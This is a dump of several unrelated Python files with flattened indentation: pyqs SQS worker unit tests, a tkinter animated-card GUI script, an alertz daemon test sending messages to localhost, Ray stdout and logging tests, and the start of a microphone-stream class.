'kwargs': {
'message': 'Test message',
},
})
@mock_sqs
def test_worker_fills_internal_queue_only_until_maximum_queue_size():
"""
Test read workers fill internal queue only to maximum size
"""
conn = boto3.client('sqs', region_name='us-east-1')
# Set visibility timeout low to improve test speed
queue_url = conn.create_queue(
QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
for i in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue(maxsize=2)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
# The internal queue should only have two messages on it
internal_queue.get(timeout=1)
internal_queue.get(timeout=1)
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_from_celery_task():
"""
Test read workers fill internal queue with celery tasks
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = (
'{"body": "KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfa'
'W5jcmVtZW50ZXInCnAyCnNTJ2Fy\\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJw'
'pwNQooZHA2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\\nZ2UyJwpwOAp'
'zcy4=\\n", "some stuff": "asdfasf"}'
)
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message2',
},
})
@mock_sqs
def test_worker_processes_tasks_from_internal_queue():
"""
Test worker processes read from internal queue
"""
del task_results[:]
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to queue
internal_queue = Queue()
internal_queue.put(
{
"message": message,
"queue": queue_url,
"start_time": time.time(),
"timeout": 30,
}
)
# Process message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
task_results.should.equal(['Test message'])
# We expect the queue to be empty now
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_and_respects_visibility_timeouts():
"""
Test read workers respect visibility timeouts
"""
# Setup logging
logger = logging.getLogger("pyqs")
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(
QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
    # Add messages
message = json.dumps(
{
"body": (
"KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfaW5jcmVtZW"
"50ZXInCnAyCnNTJ2Fy\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJwpwNQooZHA"
"2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\nZ2UyJwpwOApzcy4=\n"
),
"some stuff": "asdfasf",
}
)
for _ in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
# Run Reader
internal_queue = Queue(maxsize=1)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
# Check log messages
logger.handlers[0].messages['warning'][0].should.contain(
"Timed out trying to add the following message to the internal queue")
logger.handlers[0].messages['warning'][1].should.contain(
"Clearing Local messages since we exceeded their visibility_timeout")
@mock_sqs
def test_worker_processes_tasks_and_logs_correctly():
"""
Test worker processes logs INFO correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# Process message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
expected_result = (
u"Processed task tests.tasks.index_incrementer in 0.0000 seconds "
"with args: [] and kwargs: {}".format(kwargs)
)
logger.handlers[0].messages['info'].should.equal([expected_result])
@mock_sqs
def test_worker_processes_tasks_and_logs_warning_correctly():
"""
Test worker processes logs WARNING correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# Process message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
msg1 = (
"Task tests.tasks.index_incrementer raised error in 0.0000 seconds: "
"with args: [] and kwargs: {}: "
"Traceback (most recent call last)".format(kwargs)
) # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(
msg1.lower())
msg2 = (
'ValueError: Need to be given basestring, '
'was given 23'
) # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(
msg2.lower())
@mock_sqs
def test_worker_processes_empty_queue():
"""
Test worker processes read from empty internal queue
"""
internal_queue = Queue()
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
@patch("pyqs.worker.os")
def test_parent_process_death(os):
"""
Test worker processes recognize parent process death
"""
os.getppid.return_value = 123
worker = BaseWorker(parent_id=1)
worker.parent_is_alive().should.be.false
@patch("pyqs.worker.os")
def test_parent_process_alive(os):
"""
Test worker processes recognize when parent process is alive
"""
os.getppid.return_value = 1234
worker = BaseWorker(parent_id=1234)
worker.parent_is_alive().should.be.true
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test read workers do not exit when parent is alive and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1
# Setup dummy read_message
def read_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ReadWorker(queue_url, "foo", BATCHSIZE, parent_id=1)
worker.read_message = read_message
# Then read_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_exit(os):
"""
Test read workers exit when parent is alive and shutdown is set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1234
# Setup internal queue
q = Queue(1)
# When I have a parent process, and shutdown is set
worker = ReadWorker(queue_url, q, BATCHSIZE, parent_id=1)
worker.read_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test read workers exit when parent is dead and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 123
# Setup internal queue
q = Queue(1)
# When I have no parent process, and shutdown is not set
worker = ReadWorker(queue_url, q, BATCHSIZE, parent_id=1)
worker.read_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test worker processes do not exit when parent is alive and shutdown
is not set
"""
# Setup PPID
os.getppid.return_value = 1
# Setup dummy read_message
def process_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL, parent_id=1)
worker.process_message = process_message
# Then process_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test worker processes exit when parent is dead and shutdown is not set
"""
# Setup PPID
os.getppid.return_value = 1
# When I have no parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL, parent_id=1)
worker.process_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_exit(os):
"""
Test worker processes exit when parent is alive and shutdown is set
"""
# Setup PPID
os.getppid.return_value = 1234
# When I have a parent process, and shutdown is set
worker = ProcessWorker("foo", INTERVAL, parent_id=1)
worker.process_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_worker_processes_shuts_down_after_processing_its_max_number_of_msgs(
os):
"""
Test worker processes shutdown after processing maximum number of messages
"""
os.getppid.return_value = 1
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker._messages_to_process_before_shutdown = 2
# Then I return from run()
worker.run().should.be.none
# With messages still on the queue
internal_queue.empty().should.be.false
internal_queue.full().should.be.false
@mock_sqs
def test_worker_processes_discard_tasks_that_exceed_their_visibility_timeout():
"""
Test worker processes discards tasks that exceed their visibility timeout
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue with timeout of 0 that started long ago
internal_queue = Queue()
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": 0,
"timeout": 0,
}
)
# When I process the message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
# Then I get an error about exceeding the visibility timeout
kwargs = json.loads(message['Body'])['kwargs']
msg1 = (
"Discarding task tests.tasks.index_incrementer with args: [] "
"and kwargs: {} due to exceeding "
"visibility timeout"
).format(kwargs) # noqa
logger.handlers[0].messages['warning'][0].lower().should.contain(
msg1.lower())
@mock_sqs
def test_worker_processes_only_incr_processed_counter_if_a_msg_was_processed():
"""
Test worker process only increases processed counter if a message was
processed
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# And we add a message to the queue later
def sleep_and_queue(internal_queue):
time.sleep(1)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
thread = threading.Thread(target=sleep_and_queue, args=(internal_queue,))
thread.daemon = True
thread.start()
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker._messages_to_process_before_shutdown = 2
# Then I return from run() after processing 2 messages
worker.run().should.be.none
@mock_sqs
def test_worker_negative_batch_size():
"""
Test workers with negative batch sizes
"""
BATCHSIZE = -1
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(1)
@mock_sqs
def test_worker_too_large_batch_size():
"""
Test workers with too large of a batch size
"""
BATCHSIZE = 10000
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(MESSAGE_DOWNLOAD_BATCH_SIZE)
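# These tests run against moto's in-memory SQS mock (@mock_sqs), so no real
# AWS credentials are needed. Assuming the file lives under tests/ as the
# imports above suggest, a typical invocation would be:
#   pytest tests/test_worker.py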
|
Interfaz2.2.py
|
try:
import tkinter as tk
except ImportError:
    import Tkinter as tk
import threading
import random
class Tarjeta(tk.Canvas):
"""docstring for Tarjeta"""
def __init__(self, master = None, width = None, height = None, color = None, image = None, **kwargs):
bg = master["bg"]
super(Tarjeta, self).__init__(master = master, width = width, height = height, bg = bg, **kwargs)
self.master = master
self.width = width
self.height = height
self.coordenadas = [20, 20, self.width - 20, self.height - 20]
self.color = color
self.shape = self.create_polygon(self.coordenadas[0], self.coordenadas[1], self.coordenadas[2],
self.coordenadas[1], self.coordenadas[2], self.coordenadas[3], self.coordenadas[0], self.coordenadas[3], fill = self.color)
print("<class Tarjeta>")
self.bind("<Button-1>", self.press)
def press(self, event = None):
        def animation(verticalArriba, verticalAbajo, horizontalDrcha, horizontalIzq, Increase = 1):
tamano = -5 * Increase
verticalArriba *= Increase
verticalAbajo *= Increase
horizontalDrcha *= Increase
horizontalIzq *= Increase
for i in range(10):
coordenadas = self.coords(self.shape)
self.coords(self.shape, coordenadas[0] - tamano, coordenadas[1] - tamano,
coordenadas[2] + tamano, coordenadas[3] - tamano, coordenadas[4] + tamano,
coordenadas[5] + tamano, coordenadas[6] - tamano, coordenadas[7] + tamano)
self.master.update()
self.master.after(10)
tamano = 0
for i in range(10):
coordenadas = self.coords(self.shape)
self.coords(self.shape, coordenadas[0] + verticalArriba - tamano, coordenadas[1] + horizontalIzq - tamano,
coordenadas[2] - verticalArriba + tamano, coordenadas[3] + horizontalDrcha - tamano, coordenadas[4] - verticalAbajo + tamano,
coordenadas[5] + horizontalIzq + tamano, coordenadas[6] + verticalAbajo - tamano, coordenadas[7] + horizontalDrcha + tamano)
self.master.update()
self.master.after(10)
self.master.after(10)
x = (self.coordenadas[0]+self.coordenadas[2])/2
y = (self.coordenadas[1]+self.coordenadas[3])/2
coordenadas = self.coords(self.shape)
verticalArriba = -2
verticalAbajo = -2
horizontalDrcha = -2
horizontalIzq = -2
if event.x < x:
horizontalIzq = 2
else:
horizontalDrcha = 2
if event.y < y:
verticalArriba = 2
else:
verticalAbajo = 2
        animation(verticalArriba, verticalAbajo, horizontalDrcha, horizontalIzq, Increase = 1)
        animation(verticalArriba, verticalAbajo, horizontalDrcha, horizontalIzq, Increase = -1)
self.master.after(15)
def DetectButton(ID, event = None):
ID.config(bg = "#212f3d") #"#17202a")
def LeaveButton(ID, event = None):
ID.config(bg = "#1c2833")
def moveHeader(event = None, operator = '<', number = -8):
    # Slide the header frame one pixel per tick until its y coordinate
    # crosses `number`, rebinding the enter/leave events accordingly.
    if operator == "<":
        frameHeader.unbind("<Motion>")
        frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
    else:
        frameHeader.unbind('<Leave>')
        frameHeader.bind("<Motion>", moveHeader)
    x = int(frameHeader.place_info()['x'])
    y = int(frameHeader.place_info()['y'])
    condition = (y < number) if operator == "<" else (y > number)
    while condition:
        condition = (y < number) if operator == "<" else (y > number)
        try:
            if operator == "<":
                frameHeader.place(x = x, y = y+1)
            else:
                frameHeader.place(x = x, y = y-1)
        except tk.TclError:
            pass
        window.update()
        window.after(2)
        x = int(frameHeader.place_info()["x"])
        y = int(frameHeader.place_info()["y"])
def movHeader(event = None, operator = '<', number = -8):
hilo = threading.Thread(target = mHeader, args = (operator, number), daemon = True)
hilo.start()
# ==========================================================================================
# MAIN
# ==========================================================================================
window = tk.Tk()
print(window.winfo_screenwidth())
window.title("Homogeneous Project")
f = tk.Frame(window, width = 1250, height = 700, bg = "#308180")
f.pack()
'''
foto = tk.PhotoImage(file="./Images/a.png")
label = tk.Label(f, image=foto)
label.place(x = 0, y = 0)
label.photo = foto
'''
frameHeader = tk.Frame(f, width = int(f["width"]), height = 62, bg = "gray12")
frameHeader.place(x = 0, y = -50)
NwUsr = Tarjeta(f, height = 400, width = 300, highlightthickness = 0, color = "black")
foto = tk.PhotoImage(file="./Images/SignUp.png")
label = tk.Label(f, image=foto)
label.place(x = 70, y = (f["height"])/2 - int(NwUsr["height"])/2 + 100)
NwUsr.place(x = 0, y = (f["height"])/2 - int(NwUsr["height"])/2)
i = 0
while int(NwUsr.place_info()["x"]) < int(f["width"])/2 - int(NwUsr["height"])/2 + 50:
i += 8
NwUsr.place(x = i, y = (f["height"])/2 - int(NwUsr["height"])/2)
label.place(x = i+70, y = (f["height"])/2 - int(NwUsr["height"])/2 + 100)
window.update()
window.after(3)
x = int(NwUsr.place_info()["x"])
for i in range(10):
NwUsr.place(x = x-i*5, y = (f["height"])/2 - int(NwUsr["height"])/2)
label.place(x = (x+70)-i*5, y = (f["height"])/2 - int(NwUsr["height"])/2 + 100)
window.update()
window.after(15)
label.bind("<Button-1>", NwUsr.press)
frameHome = tk.Frame(f, width = 200, height = 700, bg = "#17202a")
frameHome.place(x = -1000, y = 0) # x = 0
NumButtons = 6
Buttons = []
for Button in range(NumButtons):
B = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
B.place(x = -1000, y = Button*62) # 212f3d # x = 0
Buttons.append(B)
OptionSqrs = []
colors = []
Jugadores = []
for i in range(len(Jugadores)):
O = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
# ------------------------------------------------------------------------------------------
# EVENTS AND BINDINGS
# ------------------------------------------------------------------------------------------
frameHeader.bind('<Motion>', moveHeader)
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
list(map(lambda Button: Button.bind("<Motion>", lambda event,
arg = Button: DetectButton(arg, event)), Buttons))
list(map(lambda Button: Button.bind("<Leave>", lambda event,
arg = Button: LeaveButton(arg, event)), Buttons))
window.bind("<Escape>", quit)
tk.mainloop()
|
test_with_dummy_client.py
|
#!/usr/bin/env python3
# test_with_dummy_client.py
import os
import threading
import time
import unittest
# from io import StringIO # UNUSED
from rnglib import SimpleRNG
from wireops.chan import Channel
# import wireops.typed as T # AS YET UNUSED
# import fieldz.msg_spec as M # AS YET UNUSED
# from fieldz.parser import StringProtoSpecParser # AS YET UNUSED
# from fieldz.msg_impl import make_msg_class, make_field_class # UNUSED
from alertz import (CORRUPT_LIST_MSG, ZONE_MISMATCH_MSG,
__version__, __version_date__, Namespace, BUFSIZE)
from alertz.chan_io import send_to_end_point
from alertz.daemon import run_the_daemon, clear_logs
# from alertz_proto_spec import ALERTZ_PROTO_SPEC # AS YET UNUSED
RNG = SimpleRNG(time.time())
class TestWithDummyClient(unittest.TestCase):
next_seq_nbr = 0 # increment after each use
def setUp(self):
pass
def tearDown(self):
pass
# utility functions ---------------------------------------------
def do_clear_logs(self, options):
self.assertIsNotNone(options)
log_dir = options.log_dir
self.assertIsNotNone(log_dir)
if not os.path.exists(log_dir):
os.mkdir(log_dir)
self.assertTrue(os.path.exists(log_dir))
clear_logs(options)
# excessive paranoia
files = os.listdir(log_dir)
if files:
self.fail('logs/ has not been cleared')
# -----------------------------------------------------
def zone_mismatch_fields(self):
""" returns a list """
timestamp = int(time.time())
seq_nbr = TestWithDummyClient.next_seq_nbr
TestWithDummyClient.next_seq_nbr += 1 # used, so increment it
zone_name = RNG.next_file_name(8)
expected_serial = RNG.next_int32()
actual_serial = RNG.next_int32()
while actual_serial == expected_serial:
actual_serial = RNG.next_int32()
# NOTE that this is a list
return [timestamp, seq_nbr, zone_name, expected_serial, actual_serial]
def next_zone_mismatch_msg(self):
values = self.zone_mismatch_fields()
return ZONE_MISMATCH_MSG(values)
# -----------------------------------------------------
def corrupt_list_fields(self):
timestamp = int(time.time())
seq_nbr = TestWithDummyClient.next_seq_nbr
TestWithDummyClient.next_seq_nbr += 1 # used, so increment it
remarks = RNG.next_file_name(16)
return [timestamp, seq_nbr, remarks]
def next_corrupt_list_msg(self):
values = self.corrupt_list_fields()
return CORRUPT_LIST_MSG(values) # GEEP
# -----------------------------------------------------
def shutdown_fields(self):
# global next_seq_nbr
# timestamp = int(time.time())
# seqNbr = next_seq_nbr
# next_seq_nbr += 1 # used, so increment it
remarks = RNG.next_file_name(16)
return [remarks, ]
def next_shutdown_msg(self):
values = self.shutdown_fields()
return shutdown_msg_cls(values) # GEEP
# actual unit test(s) -------------------------------------------
def test_the_daemon(self):
chan = Channel(BUFSIZE)
chan.clear() # XXX should be guaranteed on new channel
msg_count = 8 + RNG.next_int16(25) # so 8..32
# DEBUG
print("MSG_COUNT = %u" % msg_count)
# END
# set up options ----------------------------------
now = int(time.time())
pgm_name_and_version = "testWithDummyClient v%s %s" % (
__version__, __version_date__)
with open('/etc/hostname', 'r') as file:
this_host = file.read().strip()
options = {} # a namespace, so to speak
options['ec2Host'] = False
options['justShow'] = False
options['log_dir'] = 'logs'
options['pgm_name_and_version'] = pgm_name_and_version
options['port'] = 55555
options['showTimestamp'] = False
options['showVersion'] = False
options['testing'] = True
options['this_host'] = this_host
options['timestamp'] = now
options['verbose'] = False
ns_ = Namespace(options)
# clear the log files (so delete any files under logs/) -----
self.do_clear_logs(ns_)
# start the daemon --------------------------------
daemon_t = threading.Thread(target=run_the_daemon, args=(ns_,))
daemon_t.start()
# give the daemon time to wake up --------------------------
time.sleep(0.15) # XXX without this we get an abort saying
# that libev cannot allocate (2G - 16)B
# start sending (some fixed number of ) messages ------------
msgs_sent = []
for nnn in range(msg_count):
msg = self.next_zone_mismatch_msg()
seq_nbr_field = msg[1]
# XXX by name would be better!
self.assertEqual(nnn, seq_nbr_field.value)
# serialize msg into the channel
chan.clear()
msg.write_stand_alone(chan)
chan.flip()
# send the msg to the daemon ------------------
skt = send_to_end_point(chan, '127.0.0.1', 55555)
time.sleep(0.05)
skt.close()
msgs_sent.append(msg)
# DEBUG
print("MSG %d HAS BEEN SENT" % nnn)
# END
self.assertEqual(msg_count, len(msgs_sent))
# delay a few ms --------------------------------------------
time.sleep(0.05)
# build and send shutdown msg -------------------------------
msg = self.next_shutdown_msg()
chan.clear()
msg.write_stand_alone(chan)
chan.flip()
skt = send_to_end_point(chan, '127.0.0.1', 55555)
# DEBUG
print("SHUTDOWN MSG HAS BEEN SENT")
# END
# delay a few ms --------------------------------------------
time.sleep(0.05)
skt.close()
# join the daemon thread ------------------------------------
time.sleep(0.05)
daemon_t.join()
# verify that the daemon's logs have the expected contents --
# XXX STUB XXX
if __name__ == '__main__':
unittest.main()
|
test_output.py
|
import subprocess
import sys
import pytest
import re
import ray
from ray._private.test_utils import run_string_as_driver_nonblocking
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_actor(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self):
self.x = module.temporary_python_file()
a = Foo.remote()
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The actor with name Foo failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_task(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def foo():
return module.temporary_python_file()
ray.get(foo.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The remote function failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_worker_stdout():
script = """
import ray
import sys
ray.init(num_cpus=2)
@ray.remote
def foo(out_str, err_str):
print(out_str)
print(err_str, file=sys.stderr)
ray.get(foo.remote("abc", "def"))
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
assert out_str.endswith("abc\n"), out_str
assert "(foo pid=" in out_str, out_str
assert err_str.split("\n")[-2].endswith("def")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_core_worker_error_message():
script = """
import ray
import sys
ray.init(local_mode=True)
# In local mode this generates an ERROR level log.
ray._private.utils.push_error_to_driver(
ray.worker.global_worker, "type", "Hello there")
"""
proc = run_string_as_driver_nonblocking(script)
err_str = proc.stderr.read().decode("ascii")
assert "Hello there" in err_str, err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_disable_driver_logs_breakpoint():
script = """
import time
import os
import ray
import sys
import threading
ray.init(num_cpus=2)
@ray.remote
def f():
while True:
time.sleep(1)
print("hello there")
sys.stdout.flush()
def kill():
time.sleep(5)
sys.stdout.flush()
time.sleep(1)
os._exit(0)
t = threading.Thread(target=kill)
t.start()
x = f.remote()
time.sleep(2) # Enough time to print one hello.
ray.util.rpdb._driver_set_trace() # This should disable worker logs.
# breakpoint() # Only works in Py3.7+
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
num_hello = out_str.count("hello")
assert num_hello >= 1, out_str
assert num_hello < 3, out_str
assert "Temporarily disabling Ray worker logs" in out_str, out_str
# TODO(ekl) nice to test resuming logs too, but it's quite complicated
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_multi_stdout():
script = """
import ray
import sys
ray.init(num_cpus=1)
@ray.remote
def foo():
print()
@ray.remote
def bar():
print()
@ray.remote
def baz():
print()
ray.get(foo.remote())
ray.get(bar.remote())
ray.get(baz.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
assert "(foo pid=" in out_str, out_str
assert "(bar pid=" in out_str, out_str
assert "(baz pid=" in out_str, out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_actor_stdout():
script = """
import ray
ray.init(num_cpus=2)
@ray.remote
class Actor1:
def f(self):
print("hi")
@ray.remote
class Actor2:
def __init__(self):
print("init")
self.name = "ActorX"
def f(self):
print("bye")
def __repr__(self):
return self.name
a = Actor1.remote()
ray.get(a.f.remote())
b = Actor2.remote()
ray.get(b.f.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
print(out_str)
assert "hi" in out_str, out_str
assert "(Actor1 pid=" in out_str, out_str
assert "bye" in out_str, out_str
assert re.search("Actor2 pid=.*init", out_str), out_str
assert not re.search("ActorX pid=.*init", out_str), out_str
assert re.search("ActorX pid=.*bye", out_str), out_str
assert not re.search("Actor2 pid=.*bye", out_str), out_str
def test_output():
# Use subprocess to execute the __main__ below.
outputs = subprocess.check_output(
[sys.executable, __file__, "_ray_instance"],
stderr=subprocess.STDOUT).decode()
lines = outputs.split("\n")
for line in lines:
print(line)
assert len(lines) == 2, lines
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "_ray_instance":
# Set object store memory very low so that it won't complain
# about low shm memory in Linux environment.
# The test failures currently complain it only has 2 GB memory,
# so let's set it much lower than that.
MB = 1000**2
ray.init(num_cpus=1, object_store_memory=(100 * MB))
ray.shutdown()
else:
sys.exit(pytest.main(["-v", __file__]))
|
microphone.py
|
import speech_recognition as sr
from time import sleep
from threading import Thread
from queue import Queue
import os
class MicrophoneStream:
